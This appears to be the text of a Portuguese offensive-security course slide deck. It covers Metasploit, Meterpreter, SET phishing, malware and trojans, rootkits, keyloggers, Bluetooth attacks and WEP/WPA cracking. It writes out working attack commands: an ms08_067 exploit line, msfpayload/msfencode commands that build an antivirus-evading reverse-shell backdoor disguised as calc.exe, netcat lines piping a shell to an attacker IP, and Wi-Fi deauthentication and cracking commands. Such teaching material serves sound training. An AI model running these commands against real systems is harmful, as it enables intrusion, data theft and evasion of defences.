Exemplos de softwares: Nessus, Retina, Languard, Shadow Security Scanner
Boa opção para uma grande rede corporativa
Marcos Flávio Araújo Assunção
Scanners “especialistas” de vulnerabilidades
Focam em poucos protocolos e serviços (normalmente apenas um), por isso fazem uma análise mais apurada.
Há muitos scanners destes para http, sql, etc.
Exemplos de softwares: Nikto, SQLMap, SQL Ninja, Acunetix, W3AF, etc.
Marcos Flávio Araújo Assunção
Descobrindo novas falhas – Zero Day Debugger /
dissambler Fuzzing Registradores ESP (Stack
Pointer) EBP (Base
ponter) EIP (Instruction
pointer) Breakpoints NOP Slide Payload Exploit
Marcos Flávio Araújo Assunção
Metasploit Framework
• Criado por HD Moore, é hoje o framework de exploração de falhas mais utilizado.
• Extremamente customizável• Atualizações frequentes• Possibilidade de criação de scripts• Muitas opções de payloads• Métodos para se burlar firewalls e anti-vírus• Meterpreter• Interface console, gui e web
Marcos Flávio Araújo Assunção
MetaSploit Framework
•Framework de testes
• Objetivo
• Metodologia blackbox
• Explora Bugs através de exploits
Ex: Buffer Overflows
Marcos Flávio Araújo Assunção
Metasploit Framework
Selecionar exploit
Selecionar alvo
Selecionar Payload
Aguardar resultado
Acessar shell remoto
Marcos Flávio Araújo Assunção
Metasploit – Suíte completa
O Metasploit Framework (MSF) vem com muitos utilitários para auxiliar na realização da exploração. Vamos estudar os principais: msfconsole, msfcli, msfpayload e msfencode.
Marcos Flávio Araújo Assunção
Variáveis do Metasploit
São usadas em todos os comandos do MSF. Ex: msfconsole, msfcli, msfpayload, etc. As principais são:
• LHOST -> IP local• LPORT -> Porta local• RHOST -> IP remoto• PAYLOAD -> Tipo de payload• TARGET -> Tipo de alvo
Marcos Flávio Araújo Assunção
Msfconsole
Método mais utilizado para uso do MSF. É um console que permite escolher interativamente exploits, utilitários, payloads e configurar as devidas variáveis.
Marcos Flávio Araújo Assunção
Comandos do MSFCONSOLE
• search <nome> -> Pesquisa módulo de exploit• use <nome> -> Utiliza módulo de exploit• show <argumento> -> Mostra informações referentes ao módulo. O argumento pode ser: exploits, options, payloads ou auxiliares.• set <variável> -> Configura um valor em uma variável. Ex: LHOST, LPORT, PAYLOAD, etc.• unset <variável> -> “Desconfigura” uma variável.• exploit -> Realiza a exploração após as variáveis terem sido configuradas.
Marcos Flávio Araújo Assunção
MSFConsole – Exemplo search
search ms12
Marcos Flávio Araújo Assunção
MSFConsole – Exemplo use
use exploit/windows/smb/ms08_06_netapi
Marcos Flávio Araújo Assunção
MSFConsole – Exemplo show
show payloads
Marcos Flávio Araújo Assunção
MSFConsole – Exemplo set
set LHOST 192.168.10.1set LPORT 443set RHOST 192.168.10.2
Marcos Flávio Araújo Assunção
MSFConsole – set payload e show options
set PAYLOAD windows/meterpreter/reverse_tcpshow options
Marcos Flávio Araújo Assunção
MSFConsole - Exploit
Depois de todas as variáveis já devidamente configuradas para executar o comando exploit para realizar a exploração
Marcos Flávio Araújo Assunção
Meterpreter
Marcos Flávio Araújo Assunção
MeterpreterO MSF trabalha com vários tipos de payloads, mas o melhor de todos é o meterpreter. Algumas características dele:
• Roda diretamente na memória RAM, sem uso do disco.• Permite a execução de diversas tarefas como (shell, download e upload de arquivos, keylogger, sniffer, screenshot, RDP, etc).• Permite migrar o processo para outro executável e inicializar com o sistema• Permite limpar os rastros nos logs e finalizar anti-vírus• Permite elevar os privilégios de usuário
Marcos Flávio Araújo Assunção
Alguns comandos do Meterpreter
• ps -> Lista processos em execução• shell -> Acessa o prompt de comandos• clearev -> Limpa os logs.• run vnc -> Instala o VNC remotamente.• getsystem -> Obtém o usuário system.• keyscan_start -> Inicia o keylogger.• migrate -> Migra para outro processo.• run migrate -> Migra automaticamente• screenshot -> Tira um screenshot da tela• download -> Faz download de um arquivo
Marcos Flávio Araújo Assunção
Meterpreter – Exemplo ps
Marcos Flávio Araújo Assunção
Meterpreter – Exemplo migrate
Marcos Flávio Araújo Assunção
Meterpreter – Exemplos pwd e ls
pwd -> Mostra diretório atualls -> Lista arquivos/diretórios
Marcos Flávio Araújo Assunção
Meterpreter – Download e Upload
Sintaxe:
download <arquivo> <local>upload <arquivo> <local>
Marcos Flávio Araújo Assunção
Meterpreter – Listando Tokens
Marcos Flávio Araújo Assunção
Meterpreter Ex: getsystem, clearev e screenshot
Marcos Flávio Araújo Assunção
Meterpreter keyscan_start e sniffer_start
Observação: keyscan_stop e sniffer_stop encerram as atividades. keyscan_dump obtém o arquivo com
as teclas digitadas.Marcos Flávio Araújo Assunção
Meterpreter – Exemplo shell
Marcos Flávio Araújo Assunção
Msfcli
Marcos Flávio Araújo Assunção
Msfcli
O msfcli permite fazer tudo o que o msfconsole faz mas diretamente do shell, em uma única linha de comando. É muito prático quando usado em scripts.
Sintaxe:
msfcli <módulo> <payload> <variáveis> <modo>
Em modo normalmente utilizando a opção E para permitir a execução imediata do exploit.
Marcos Flávio Araújo Assunção
Msfcli – Exemplo real
msfcli exploit/windows/smb/ms08_067_netapi PAYLOAD=windows/meterpreter/reverse_tcp RHOST=192.168.10.2 LHOST=192.168.10.1 LPORT=443 E
No exemplo acima estamos executando o msfcli contra o host remoto (RHOST) 192.168.10.2 configurando como PAYLOAD o meterpreter de conexão reversa e dizendo que ele deve se conectar de volta no ip 192.168.10.1 (LHOST) na porta 443 (LPORT).
Marcos Flávio Araújo Assunção
Msfpayload
Marcos Flávio Araújo Assunção
MsfpayloadPermite converter qualquer um dos payloads do metasploit para um arquivo puro(raw) ou mesmo um executável. Isso permite que você possa utilizar o payload como um backdoor comum.
Sintaxe:
msfpayload <payload> <variáveis> <modo>
Em modo normalmente utilizando a opção X para permitir que o payload executável seja criado.
Marcos Flávio Araújo Assunção
Msfpayload
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.10.1 LPORT=443 X > backdoor.exe
No exemplo acima estamos gerando o executável backdoor.exe ao rodar o msfpayload como PAYLOAD do meterpreter de conexão reversa e dizendo que ele deve se conectar de volta no ip 192.168.10.1 (LHOST) na porta 443 (LPORT).
Se for um payload de conexão reversa é necessário um Multi-Handler no MSFConsole ou MSFCli para receber a conexão de volta. No próximo slide veremos como criar um.
Marcos Flávio Araújo Assunção
Multi-Handler: Msfconsole x Msfcli
Marcos Flávio Araújo Assunção
Msfencode
Marcos Flávio Araújo Assunção
MsfencodePermite codificar qualquer um dos payloads em arquivo puro(raw) gerados pelo msfpayload. O objetivo é fazer com que assim o payload não seja detectado por anti-vírus e ferramentas de IDS. Sintaxe:
msfencode –i <arq> -e <encoder> -c <vezes> -t <modo> -o <arq>
Opções mais comuns:
-i -> arquivo de entrada-e -> tipo de encoder. Ex: x86/shikata_ga_nai-c -> vezes que o encoder irá codificar.-t -> tipo de arquivo gerado. Normalmente é exe.-o -> arquivo de saída-x -> executável para ser usado como base-k -> Permite execução paralela (usado com o –x).Marcos Flávio Araújo Assunção
Msfencode – Uso com arquivo raw
msfencode -t exe –i backdoor.raw -o backdoor.exe -e x86/shikata_ga_nai -c 5
Marcos Flávio Araújo Assunção
Msfpayload + Msfencode (única linha)
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.10.1 LPORT=443 R > msfencode –x calc.exe -k -o calcmalvada.exe -e x86/shikata_ga_nai -c 7 –t exe
Marcos Flávio Araújo Assunção
Fast-Track
Marcos Flávio Araújo Assunção
Fast-Track Foi criado como um complemento para o Metasploit. Permite automatizar exploração (autopwn), realizar ataques ao lado cliente, executar SQL injection e diversas outras tarefas. Possui um modo gráfico e console. Utilizaremos somente o segundo modo. Para acessá-lo basta digitar ./fast-track.py -i
Marcos Flávio Araújo Assunção
Fast-Track – Menu principal
Marcos Flávio Araújo Assunção
Fast-Track - Atualização
Marcos Flávio Araújo Assunção
Fast-Track - Autopwn
A opção autopwn seleciona automaticamente diversos tipos de exploits e os utiliza contra o alvo, aumentando a chance da exploração ser bem sucedida. Entretanto, o autopwn é mais fácil de detectar por um sistema de IDS.
Marcos Flávio Araújo Assunção
Fast-Track – NMAP Engine
Marcos Flávio Araújo Assunção
Fast-Track SQL Inject
Marcos Flávio Araújo Assunção
Fast-Track – SQL Inject
Marcos Flávio Araújo Assunção
Fast-Track Mass Client Attack
Marcos Flávio Araújo Assunção
Fast-Track – Exploits diversos
Marcos Flávio Araújo Assunção
Fast-Track Binary to Hex
Marcos Flávio Araújo Assunção
Fast-Track – Payload Generator
Marcos Flávio Araújo Assunção
SET (Social Engineering Tool)
Marcos Flávio Araújo Assunção
SET
Também foi criado como um complemento para o Metasploit. Consegue criar modelos falsos de websites, enviar e-mail em massa, criar phishing, gerar documentos com falhas, criar um ataque Wireless e muito mais.
Para iniciar acesse o diretório /pentest/exploits/set e digite o comando: ./set
Marcos Flávio Araújo Assunção
SET – Menu principal
Marcos Flávio Araújo Assunção
SET – Menu Engenharia Social
Marcos Flávio Araújo Assunção
SET – Spear Phishing
Marcos Flávio Araújo Assunção
SET – Mass E-mailer
Marcos Flávio Araújo Assunção
SET - WebAttack
Marcos Flávio Araújo Assunção
SET – Ataque autorun USB/CD
Marcos Flávio Araújo Assunção
SET – Create payload and listener
Marcos Flávio Araújo Assunção
SET – Java Applet Attack
Marcos Flávio Araújo Assunção
SET – Ataques equipamentos Arduino
Marcos Flávio Araújo Assunção
SET – Wireless Fake AP Attack
Marcos Flávio Araújo Assunção
Vulnerabilidades de Malware
Marcos Flávio Araújo Assunção
Definição
Malicious SoftwareOrigemObjetivosMalwares passivosMalwares ativosRisco
Marcos Flávio Araújo Assunção
Métodos de Infecção dos Malwares
Marcos Flávio Araújo Assunção
SimplesRápidoConfiávelContatosFake mailPhishing
Marcos Flávio Araújo Assunção
Messengers
MSNICQGoogleTalkConfiabilidadeMenor desconfiançaEficiência
Marcos Flávio Araújo Assunção
Código móvel
ActiveXJavascriptVBScriptSites maliciososNavegador
desatualizado
Marcos Flávio Araújo Assunção
Falhas
Buffer overflowsElevação de
privilégiosSQL InjectionXSS
Marcos Flávio Araújo Assunção
Mídia de armazenamento
CDDVDPen-DriveAutorunCuriosidadeMenor
desconfiança
Marcos Flávio Araújo Assunção
Métodos de Ocultamento
Marcos Flávio Araújo Assunção
Binders
Juntar programasJogo + backdoorExecução
programadaAlteração do
registroSenna SpyWordpad
Marcos Flávio Araújo Assunção
Steganografia
Método eficienteBurla proteçõesImagensMP3BináriosEspaçamento
Marcos Flávio Araújo Assunção
Edição/remoção de recursos binários
Permite “mudar” a estrutura binária de um malware, dificultando detecção por AVs
Marcos Flávio Araújo Assunção
Edição hexadecimal
Permite “mudar” certas strings em um software, tentando com isto dificultar a detecção por AVs
Marcos Flávio Araújo Assunção
Ocultamento do Firewall
Proteção “cara-crachá” Filtro de pacotes
- Spoofing- Porta de origem- Conexão reversa
Sandbox- DLL injection
Personal Firewall killing (processo)
Tunneling- HTTP (proxy)- ICMP (ping)- DNS
Marcos Flávio Araújo Assunção
Ocultamento do IDS
AssinaturaComportamentoFragmentaçãoTunelamentoCriptografia
Marcos Flávio Araújo Assunção
Ocultamento do Anti-Virus
Assinatura Edição recursos Editor Hexa Compressão
do executável Polimorfismo de
código
Marcos Flávio Araújo Assunção
Alternate Data Streams
Permite criar “camadas” de dados adicionais em sistemas NTFS
Exemplo: texto.txt:virus.exe Pode ser aberto com o
comando start. Ex:
start c:\teste\texto.txt:oculto.txt
Marcos Flávio Araújo Assunção
Backdoors
Marcos Flávio Araújo Assunção
Definição
Porta dos fundos
Easter EggSenhasModificação
de serviços originais
Criação de novo serviço
Marcos Flávio Araújo Assunção
NetCat
Muito conhecidoCanivete SuiçoCryptoCatClienteServiço localConexão
reversa
Marcos Flávio Araújo Assunção
Netcat – Conexão diretaEste método é relativamente o mais simples, mas também o mais facilmente detectado e impedido. O atacante já precisa possuir acesso prévio ao sistema que deseja infectar. Ele então roda o Netcat no sistema alvo, abrindo uma porta TCP e anexando um processo de shell a ela.
O seguinte comando por exemplo funcionaria em sistemas Windows:
nc –L –p 100 –e cmd.exe –vv
A opção –d poderia ser utilizada para “esconder” o processo da console.
Basta agora o atacante se conectar via telnet ou nc na porta 100 do sistema infectado.
Marcos Flávio Araújo Assunção
Netcat – Conexão direta
Marcos Flávio Araújo Assunção
Netcat – Conexão reversa•Nesse método o “atacante” será o servidor. O cliente inicia a conexão.
• Ele deverá abrir duas portas com o Netcat, usando quaisquer números. Tudo o que for digitado pelo cliente na primeira porta, será processado pelo shell através do pipe e mostrado como resultado na segunda porta.
• Usando engenharia social ou outro método, força-se o cliente a se conectar às duas portas com telnet (ou o próprio NetCat, mais recomendado no caso do Windows)
• Exemplo:
Vamos supor que abri as portas 79 e 53, ambas TCP, no meu sistema. Meu endereço IP é 20.0.0.1 e agora preciso que a “vítima” digite os comandos para se conectar em mim. Exemplo:
telnet 20.0.0.1 79 | /bin/sh | telnet 20.0.0.1 53 (para sistemas Linux-like)
Nc 20.0.0.1 79 | cmd.exe | telnet 20.0.0.1 53 (para sistemas Windows)
Marcos Flávio Araújo Assunção
Netcat – Conexão reversa
Marcos Flávio Araújo Assunção
Tunelamento ICMP - Loki
Tunelamento ICMPICMP_ECHOICMP_ECHOREPLYLokiLokid
Marcos Flávio Araújo Assunção
Tunelamento ICMP - ICMPCMD
Proof of concept
Sistemas Windows
Usa apenas o “ping” para se comunicar
Marcos Flávio Araújo Assunção
Tunelamento HTTP - Reverse WWW Backdoor
The Hackers Choice
“Placing Backdoors througt Firewalls”
Proof of ConceptTunelamentoHTTPProxy
Marcos Flávio Araújo Assunção
Cavalos de Tróia
Marcos Flávio Araújo Assunção
Definição
ObjetivoTróiaBindersWindowsPrimeira geraçãoSegunda geraçãoTerceira geração
Marcos Flávio Araújo Assunção
Back Orifice
Cult of dead cow1997Primeira geraçãoWindows 9xConexão comumSem opção de
alertaPlug-ins
Marcos Flávio Araújo Assunção
Netbus
Carl Frederik1998Primeira geraçãoWindows 9x e NTConexão comumAlerta por e-mailSem plug-ins
Marcos Flávio Araújo Assunção
SubSeven 2.1
2000Segunda geraçãoWindows 9x e NTConexão comumAlerta por e-mail,
ICQ e IRCPlug-insScanner remoto
Marcos Flávio Araújo Assunção
Beast2003Terceira GeraçãoConexão comum e
reversaKeyloggerScreenloggerDLL InjectionFirewall killing
Marcos Flávio Araújo Assunção
Beast realizando conexão reversa
Marcos Flávio Araújo Assunção
Poison Ivy
2005Terceira
GeraçãoConexão
comum e reversa
TunelamentoCriptografiaWebcamFarejamento
remoto
Marcos Flávio Araújo Assunção
Dark Comet 2010 Quarta geração Possui várias
novidades como:
- Suporte a dns dinâmico (no ip)- Diferentes tipos de tunelamento- Cliente/server FTP- Novos métodos de ocultamento do server- Etc
Marcos Flávio Araújo Assunção
Rootkits
Marcos Flávio Araújo Assunção
Definição“Kit do root”PropagaçãoEsconde
informações vitaisNível de AplicaçãoNível de BibliotecaNível de KernelNível de
Virtualização
Marcos Flávio Araújo Assunção
Hacker Defender
2002HxDefMorphineBaseado em
kernelArquivosProcessosPastasConexões
Marcos Flávio Araújo Assunção
AFX Rootkit2005APIs do WindowsBaseado em
bibliotecaProcessosServiçosConexõesÍconesArquivos
Marcos Flávio Araújo Assunção
Zero Access Rootkit
2011 Kernel mode
rootkit Infecta sistemas
de 32 e 64 bits Usa falhas web
(browser, java, flash) como principal método de propagação
Marcos Flávio Araújo Assunção
Keyloggers
Marcos Flávio Araújo Assunção
Definição de Keylogger
Captura do teclado
InterrupçãoMensagensKeyloggers
locaisKeyloggers com
envio remotoKeyloggers
físicosMarcos Flávio Araújo Assunção
Home Keylogger
LocalSimplesFácil utilizaçãoNão é detectadoGrava em um
arquivo de texto comum
Marcos Flávio Araújo Assunção
Spy Lantern Keylogger
RemotoComercialDetectadoCriptografiaE-mail
Marcos Flávio Araújo Assunção
Keylogger físico
Necessita acesso Físico
Versões PS2 e USB
Senha para acesso ao conteúdo
Versão com suporte a wi-fi
Marcos Flávio Araújo Assunção
Screenloggers
Marcos Flávio Araújo Assunção
Definição
ScreenshotsVisualRemotoIdeal para captura
de teclados virtuais
Muito utilizado em vírus do tipo “Banker”
Marcos Flávio Araújo Assunção
Perfect Keylogger
BlazingToolsComercialGrava shots
no discoEnvia shots
por e-mailInstalação
remota
Marcos Flávio Araújo Assunção
Ardamax Keylogger
ComercialWebUpdateE-mailLANFTP
Marcos Flávio Araújo Assunção
Vulnerabilidades de BlueTooth
Marcos Flávio Araújo Assunção
Ataques a Bluetooth
War-Snipping BlueJacking BlueSnarfing BlueBugging BlueSniper Denial of Service
Marcos Flávio Araújo Assunção
War-Snipping
Para descobrir dispositivos
Envia dados aleatórios(lixo) visando uma resposta qualquer do dispositivo
Permite detectar a maior parte dos dispositivos conhecidos
Marcos Flávio Araújo Assunção
BlueJacking
Também chamado de BlueSpamming
Envia um VCard para outro dispositivo
No campo de identificação do nome, substitui pela mensagem
Usado para BlueDating e BlueChat
Marcos Flávio Araújo Assunção
BlueSnarfing
Roubo de informações do dispositivo
Contatos, calendário
Calendário Problemas no
protocolo OBEX (get invés de push vcard)
Dispositivos mais antigos
Marcos Flávio Araújo Assunção
BlueBugging
Permite acesso a comandos do celular
Mais poderoso que o BlueSnarfing
Permite fazer chamadas, enviar SMS e até ouvir conversas alheias.
Geralmente utiliza um laptop
Marcos Flávio Araújo Assunção
BlueSniper
O BlueTooth é realmente limitado a uma comunicação de 100 metros?
Marcos Flávio Araújo Assunção
BlueSniper
Marcos Flávio Araújo Assunção
BlueSniper
Permite encontrar dispositivos Bluetooth a 1 Km de distância!
Marcos Flávio Araújo Assunção
Vulnerabilidades de Wi-Fi
Marcos Flávio Araújo Assunção
Redes 802.11 (Wi-Fi)
• Princípios• Frequências:2.4GHz / 5 GHz• Canais e interferência• ESSID e BSSID• DS (Sistema de Distribuição)• IBSS ou AD-HOC• BSS• ESS
Marcos Flávio Araújo Assunção
BSS (Basic Service)
• Associação“Conectar-se” ao Access Point
• AutenticaçãoOSA (Open System Authentication)SKA (Shared Key – WEP)PSK (WPA Personal - Pre-Shared Key)802.1X (WPA Enterprise – Radius)
Marcos Flávio Araújo Assunção
ESS (Extended Service)• Desassociação
“Desconectar-se” de um AP e “reconectar” em outro em um ESS. Iniciado normalmente pela estação.
• DesautenticaçãoDesautenticar uma estação wi-fi. Automaticamente ela também é desassociada. Iniciado pelo AP.
Marcos Flávio Araújo Assunção
Elementos de Segurança Wi-Fi• Criptografia
WEP, WEP2, WEP DinâmicoWPA, WPA2
• AutenticaçãoOSA, Shared Key (WEP), WPA-PSK, WPA-Enterprise (802.1X)
• Rede invisível (ESSID oculto)
• Filtro de endereços MAC
• WIDS / WIPS (Wireless IntrusionPrevention System).
• Outros (VLAN, proteção contra ARPno AP, etc).
Marcos Flávio Araújo Assunção
Ataques à redes Wireless
Ataques à Infra-estrutura: Negação de Serviço (DoS) Burlando filtros de MAC WarDriving (detecção passiva/ativa)
Ataques de criptoanálise/força-bruta: Decriptação de IVS no WEP (Wep Cracking) Bruteforce em handhshakes WPA
Ataques ao usuário Wi-Fi: Rogue Access Point Evil Twin Ataque MITM com DNS Spoofing
Marcos Flávio Araújo Assunção
WarDriving – Detectando e mapeando redes Wi-Fi
Marcos Flávio Araújo Assunção
Wardriving
Mapeamento de redes wirelessUsado como método de descoberta passiva de redes
Tecnicamento envolve o uso de um automóvel para gravar informações wireless sobre uma larga àrea
Warflying utilizam aviões ao invés de automóveis
Wardriving em si não é uma atividade ilegal
Usar o sinal de rádio para se conectar a redes sem a permissão do dono é ilegal
Marcos Flávio Araújo Assunção
Hardware para o wardriving
Marcos Flávio Araújo Assunção
Hardware para o Wardriving
Computadores móveis Notebook/tablets Smartphones
Interface de rede Wireless Possui diversas formas e estilos
Formato USB Placa PCI Placa PCMCIA Cartão CompactFlash (CF)
Marcos Flávio Araújo Assunção
Hardware para o wardriving
Antenas Anexando uma antena externa irá aumentar
muito o alcance da descoberta das redes wireless
Características fundamentais Se a frequência aumenta o comprimento de onda
diminui. Se o ganho da antena aumenta a àrea de cobertura
diminui
Marcos Flávio Araújo Assunção
Hardware para o wardriving
Antenas (continuação) Categorias básicas
Omni-direcional• Detecta igualmente sinais de todas as direções
Semi-direcional• Foca em uma direção específica
Direcional• Envia o sinal em uma direção bem definida
(ângulo bem fechado)
Marcos Flávio Araújo Assunção
Hardware para o wardriving
Marcos Flávio Araújo Assunção
Antena e NIC sugeridos
Antena e NIC de 58dbi e 8000mw Modelo: EDUP EP-MS8515GSChipset: Ralink 3070L e Realtek 187LAlcance do sinal: + de 5 KM
Marcos Flávio Araújo Assunção
Hardware para o wardriving
Marcos Flávio Araújo Assunção
Hardware para o wardriving
Marcos Flávio Araújo Assunção
Softwares para o wardriving
Aplicações open-source Kismet
Roda em sistemas Linux (existe porte para Windows) Pode reportar dados similares ao NetStumbler Também suporta GPS Pode capturar pacotes e salvá-los em um arquivo
airodump-ng Possui quase todos os recursos do Kismet (menos o
GPS). Permite integração com outras ferramentas da suíte NG.
Marcos Flávio Araújo Assunção
WarDriving - Kismet
Marcos Flávio Araújo Assunção
WarDriving – airodump-ng
Marcos Flávio Araújo Assunção
Denial of Service (Recusa de serviço) em redes Wi-Fi
Marcos Flávio Araújo Assunção
Ataques Denial of Service (DoS)
Ataques DoS no Wireless Negam o acesso de dispositivos wi-fi ao AP Categorias
Ataques da camada física Ataques da camada de enlace (MAC)
Ataques da camada física Inunda o espectro com interferência
eletromagnética Para prevenir ao dispositivo de se comunicar com o
AP
Marcos Flávio Araújo Assunção
DoS Camada física
Marcos Flávio Araújo Assunção
DoS Camada de Enlace (MAC)
Marcos Flávio Araújo Assunção
Filtro de MAC e Redes ocultas
Marcos Flávio Araújo Assunção
Aplicando Filtro de MAC
Marcos Flávio Araújo Assunção
Trocando o MAC da estação
Marcos Flávio Araújo Assunção
Filtro de MAC “burlado”
Marcos Flávio Araújo Assunção
Ocultando uma rede para protegê-la
Marcos Flávio Araújo Assunção
Detectando redes ocultasMesmo que uma rede esteja oculta podemos detectar sua presença ao monitorar os probes dos dispositivos clientes no Wireshark. Isso só é possível no modo de monitoração
com a interface mon0.
O que é exatamente este “Modo de Monitoração”?
Marcos Flávio Araújo Assunção
Modo de Monitoração
Neste modo (RFMON) podemos monitorar o tráfego das redes wi-fi sem precisarmos nos
associar à elas. Utilitário: airmon-ngMarcos Flávio Araújo Assunção
Descobrindo APs e estações com Airodump
Permite monitorar redes wireless e capturar pacotes para serem analisados posteriormente. Consegue detectar Access Points em qualquer canal, mesmo estando “invisíveis”. Detecta também estações Wi-Fi associadas ou tentando se associar. Ou seja, as máquinas dos usuários serão detectadas.
Marcos Flávio Araújo Assunção
Fundamentos e ataques a WEP
Marcos Flávio Araújo Assunção
Ataques à criptografia: WEPAs vulnerabilidades são baseadas em como o
WEP e a cifra RC4 são implementadosWEP só pode utilizar uma chave de 64 ou 128
bits Vetor de inicialização(IV) de 24 bits e uma chave
padrão de 40 ou 104 bits Tamanho relativamente pequeno da chave limita a
sua força
Implementação do WEP cria um padrão que pode ser detectado por atacantes IVs são números de 24 bits IVs começam a se repetir em menos de sete horas
Marcos Flávio Araújo Assunção
Vulnerabilidades do WEP
Implementação do WEP cria um padrão que pode ser detectado por atacantes (continuação) Alguns sistemas wireless sempre começam
com o mesmo IVColisão
Dois pacotes criptografados com o mesmo IVAtaque de dedução de chave
Determina a chave através da análise de dois pacotes que se colidiram (mesmo IV)
Marcos Flávio Araújo Assunção
WEP Hacking –Airodump
Primeiramente, usamos o airodump-ng para filtrar todas as redes com criptografia WEP disponíveis. No examplo acima selecionaremos a rede com o ESSID
carol para realizar o ataque.
airodump-ng --encrypt wep mon0
Marcos Flávio Araújo Assunção
WEP Hacking - Airodump
Na primeira imagem, rodamos o airodump-ng na interface mon0 filtrando: canal 11, bssid do AP da rede carol e
salvando o resultado para o arquivo chaveWEP. Veja o resultado na segunda imagem.
Agora, teremos que esperar. O campo “Data” deve capturar milhares de pacotes IVS para que seja possível realizar a
decoficação. Tem como acelerar o processo?
Marcos Flávio Araújo Assunção
WEP Hacking - Aireplay
Utilizando o aireplay-ng nós realizamos o ataque caffe-latte que pede aos dispositivos conectados à rede carol que nos enviem mais pacotes IVS. Com isso veja que temos mais de 40000 pacotes no campo #Data. É mais que suficiente para quebrar uma chave de 64 bits WEP.
Marcos Flávio Araújo Assunção
WEP Hacking - Aircrack
Executamos o aircrack-ng com o nome do arquivo que foi capturado pelo airodump-ng. Veja que o número de IVS já chegava a 71406. Com isso a chave foi rapidamente quebrada. A chave utilizada é porco.
Marcos Flávio Araújo Assunção
Descriptografando os pacotes capturados
O airdecap-ng é um utilitário que consegue descriptografar todo o tráfego armazenado em um arquivo PCAP, bastando fornecer a chave WEP ou WPA descoberta previamente. Assim, o atacante poderá utilizar o Wireshark para visualizar os dados que já foram capturados.
Marcos Flávio Araújo Assunção
Fundamentos e ataques a WPA
Marcos Flávio Araújo Assunção
Acesso Protegido Wi-Fi (WPA)
Padrão do 802.11i que cuida tanto da criptografia quanto da autenticação
Temporal Key Integrity Protocol (TKIP) Chaves TKIP são conhecidas como “chave por
pacote” TKIP dinâmicamente gera uma nova chave para
cada pacote criado Previne colisões
Que era justamente uma das fraquezas principais do WEP
Marcos Flávio Araújo Assunção
Acesso Protegido Wi-Fi (WPA)
Autenticação WPA Cumprida por usar tanto o padrão IEEE 802.1x ou
tecnologia de chave previamente compartilhada (PSK)
A autenticação PSK usa uma frase para gerar a chave de criptografia. Funciona como uma senha. A frase deve ser previamente inserida em cada Access
Point e dispositivo Wireless. Serve como seed para gerar matematicamente as
chaves de criptografia
WPA foi elaborado para resolver as vulnerabilidades do WEP com um mínimo de inconveniência
Marcos Flávio Araújo Assunção
Acesso Protegido Wi-Fi 2 (WPA2)
Segunda geração da segurança WPAUsa o Advanced Encryption Standard
(AES) para criptografia dos dados Suporta autenticação IEEE 802.1x ou
tecnologia PSKWPA2 permite que ambas as tecnologias
AES e TKIP operem na mesma rede WLAN
Marcos Flávio Araújo Assunção
Configurando WPA no Roteador
Marcos Flávio Araújo Assunção
WPA Hacking – Airodump
Assim como fizemos com o WEP, vamos filtrar no airodump-ng todas as redes que utilizem criptografia WPA e WPA2 com o comando: airodump-ng –encrypt wpa mon0
Vamos escolher a rede com o ESSID EmpresaX para realizar o ataque.
Marcos Flávio Araújo Assunção
WPA Hacking – Airodump
Também da mesma forma filtraremos no airodump-ng: canal 6, o bssid da rede EmpresaX e salvaremos o resultado no arquivo chaveWPA. Tudo isso deve ser feito na interface mon0. Comando:
airodump-ng –c 6 –bssid 50:CC:F8:85:ED:B2 –w chaveWPA mon0
O próximo passo é capturar o handshake do WPA. Isso só é possível quando algum cliente se conectar na rede. Podemos acelerar esse processo deautenticando os usuários com o aireplay
Marcos Flávio Araújo Assunção
WPA Hacking – Aireplay
Utilizamos no aireplay o MAC do AP (-a) e o MAC do cliente (-c) que foi detectado no airodump. Enviamos 5 pacotes de desassociação .
Verifique no airodump que o WPA Handshake foi capturado.
Marcos Flávio Araújo Assunção
Handshake WPA
Verifique no airodump que o WPA Handshake foi capturado. O que fazer com isto? Entra agora o processo de força-bruta.
Marcos Flávio Araújo Assunção
WPA Hacking – Aircrack-ng
Primeiramente, ao contrário do WEP, precisamos ter uma wordlist (lista de palavras) para tentar realizar a força-bruta no handshake WPA que foi capturado. Uma rainbow table pode ser usada para acelerar o processo.
O BackTrack Linux já possui uma lista gigantesca no arquivo /pentest/passwords/wordlists/rockyou.txt (mais de 100 MB)
Marcos Flávio Araújo Assunção
Aircrack – Força-Bruta na chave
A chave foi descoberta. É nossoprecioso
Marcos Flávio Araújo Assunção
WPS – Wireless Protected Setup
Marcos Flávio Araújo Assunção
WPA Hacking – WPS PIN Hacking
O PIN foi configurado para o Wi-Fi Protected
Setup. Ele é 94154016.Marcos Flávio Araújo Assunção
WPA Hacking – WPS PIN Hacking
No exemplo da imagem anterior eu pedi o wash para usar a interface mon0 e ignorar erros de frame check sequence (fcs). Ele encontrou a minha rede defhack e outra que também usa WPS.
Marcos Flávio Araújo Assunção
WPA Hacking – WPS PIN HackingVamos executar como exemplo o Reaver "travando" em um determinado canal (opções -f e -c 6), modo verbose (-vv) e usando o bssid do meu Access Point (-b):
Marcos Flávio Araújo Assunção
WPA Hacking – WPS PIN Hacking
A partir deste momento o reaver irá tentar centenas de combinações até descobrir o pin.
Marcos Flávio Araújo Assunção
Rogue AP e Evil Twin – As piores ameaças contra redes sem fio Wi-Fi
Marcos Flávio Araújo Assunção
Ataques diretos através de Rogue APs e
Evil TwinAccess Point ilegítimo (Rogue AP)
AP instalado por um funcionário Sem a aprovação ou supervisão da equipe de TI
Está dentro da companhia e possui um ESSID diferente
Evil Twin (fake AP) É um AP que imita o ESSID de uma rede wi-fi
real. Visa enganar e confundir os clientes para que se conectem ao mesmo. Normalmente está fora do ambiente físico da empresa.
Marcos Flávio Araújo Assunção
Rogue APs e Evil Twin
Marcos Flávio Araújo Assunção
Rogue AP – Airbase-ng
O utilitário Airbase-ng permite “iniciar” um Access Point via software (softAP). Isso pode facilmente ser usado em conjunto com uma rede cabeada para criar um Rogue AP.
(Lembre: Rogue AP não é um Evil Twin, ESSIDs diferentes)
Perceba que o airbase-ng cria uma interface at0 .
Marcos Flávio Araújo Assunção
Rogue AP – Visão do cliente
O cliente enxerga a rede Faculdade e tenta se conectar à ela. Vamos ver se a conexão foi efetuada com sucesso.
Marcos Flávio Araújo Assunção
Evil Twin – Servidor DHCP
Um Evil Twin pode ser configurado para fornecer endereço IP aos clientes que se conectarem ao nosso access point.
Marcos Flávio Araújo Assunção
Evil Twin – Desautenticando clientes originais
Vamos desconectar os clientes da rede original. Iremos executar o aireplay-ng com --deauth em broadcast para toda a rede
Marcos Flávio Araújo Assunção
Evil Twin – Cliente recebendo IP do DHCP
